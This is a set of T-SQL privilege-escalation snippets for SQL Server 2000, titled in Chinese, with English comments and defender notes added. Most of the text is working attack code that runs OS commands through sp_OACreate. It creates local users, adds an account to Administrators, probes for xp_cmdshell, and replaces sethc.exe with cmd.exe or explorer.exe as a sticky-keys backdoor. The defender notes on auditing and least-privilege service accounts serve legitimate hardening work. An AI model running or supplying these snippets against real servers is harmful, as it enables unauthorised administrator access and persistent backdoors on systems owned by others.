SQL Server 2000 SA 提权方法
-- Instantiates the WScript.Shell COM object through the OLE Automation procedures
-- (sp_OACreate) and calls its Run method with a cmd.exe command line that creates a
-- local Windows account named "test" with the password "test".
-- Prerequisites this snippet does not check: the login must be allowed to execute
-- sp_OACreate/sp_OAMethod (sysadmin by default), and the spawned process inherits the
-- SQL Server service account, so the command only succeeds when that account holds
-- the Windows right to manage local users. The Run call returns no command output, so
-- success or failure of "net user" is invisible to the caller.
-- Defender note: sp_OACreate from an application login is rarely legitimate -- audit
-- it, run the service under a least-privilege account rather than LocalSystem, and keep
-- the OLE Automation procedures disabled where the engine allows it (SQL Server 2005+:
-- sp_configure 'Ole Automation Procedures').
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c net user test test'
-- Same WScript.Shell / Run mechanism as above, this time adding the account
-- "IUSR_InterNet" to the local Administrators group. IUSR_<MACHINENAME> is the naming
-- convention of the IIS anonymous account, so "InterNet" is presumably the host name of
-- the author's environment rather than a generic value -- confirm before reading this
-- as anything but an example.
-- Defender note: membership changes to Administrators are a high-value audit event;
-- the IIS anonymous account should never be a local administrator, and the SQL Server
-- service account should not hold the rights needed to run "net localgroup ... /add".
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
@shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators IUSR_InterNet /add'
-- Counts rows in master..sysobjects for an extended stored procedure (xtype 'X')
-- named xp_cmdshell: 1 means the procedure is still registered, 0 means it has been
-- dropped. sysobjects is the SQL Server 2000 catalog; it is deprecated in later
-- versions, and registration alone does not mean xp_cmdshell is usable (from 2005
-- on it is additionally gated by sp_configure 'xp_cmdshell').
-- Defender note: probes of the catalog for xp_cmdshell are a common reconnaissance
-- signal; consider auditing them alongside sp_OACreate usage.
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回 1 证明该扩展存储过程存在
-- Creates a local Windows account without going through cmd.exe: instantiates the
-- Shell.Users COM object, calls Create to add a user named "test" (handle in @z),
-- sets its 'setting' property keyed "AccountType" to 3, and calls ChangePassword.
-- The meaning of AccountType value 3 is not shown here -- NOTE(review): it is
-- presumably the administrator account type; confirm against the Shell.Users
-- documentation. The ChangePassword arguments appear to be (new password '123456',
-- old password '') -- confirm the parameter order.
-- Same prerequisites as the WScript.Shell variants: sp_OA* execute rights and a
-- service account that is itself allowed to create local users. Because no process is
-- spawned, command-line based detection does not see this; audit sp_OACreate and
-- local account creation events instead.
DECLARE @o int
DECLARE @z int
EXEC sp_OACreate 'Shell.Users',@o OUT
EXEC sp_OAMethod @o, 'Create', @z OUT, 'test'
EXEC sp_OASetProperty @z, 'setting', 3 , 'AccountType'
EXEC sp_OAMethod @z, 'ChangePassword',NULL , '123456', ''
REM Windows-side commands, not T-SQL: the first opens the User Accounts dialog, the
REM second the Local Users and Groups MMC snap-in. Both need an interactive desktop,
REM so they are not run through the database connection; presumably they are used to
REM inspect the accounts created by the preceding statements -- confirm.
rundll32 netplwiz.dll,UsersRunDll
lusrmgr.msc
-- Uses the Scripting.FileSystemObject COM object to copy cmd.exe over sethc.exe
-- (the NULL third argument discards CopyFile's return value). sethc.exe is the
-- Windows accessibility helper, so overwriting it is the well-documented
-- accessibility-binary substitution technique (MITRE ATT&CK T1546.008). The original
-- sethc.exe is overwritten in place; no backup is taken.
-- Requires sp_OA* execute rights and a service account with write access to
-- %SystemRoot%\system32; on SQL Server 2000-era Windows, Windows File Protection may
-- restore the original file.
-- Defender note: file-integrity monitoring on the system32 accessibility binaries
-- detects this regardless of how the copy was performed; running SQL Server under a
-- non-administrative service account prevents the write in the first place.
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\WINDOWS\system32\cmd.exe' ,'c:\windows\system32\sethc.exe';
-- Variant of the preceding snippet that copies explorer.exe (from c:\WINDOWS) over
-- sethc.exe instead of cmd.exe; mechanism, prerequisites and the ATT&CK mapping
-- (T1546.008) are the same. Note the statement ends without a terminating semicolon,
-- unlike the cmd.exe version -- harmless in T-SQL but inconsistent.
-- Defender note: the same integrity-monitoring and least-privilege service-account
-- controls apply; a mismatch between sethc.exe's hash and the expected Windows
-- binary is the direct indicator.
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\WINDOWS\explorer.exe' ,'c:\windows\system32\sethc.exe'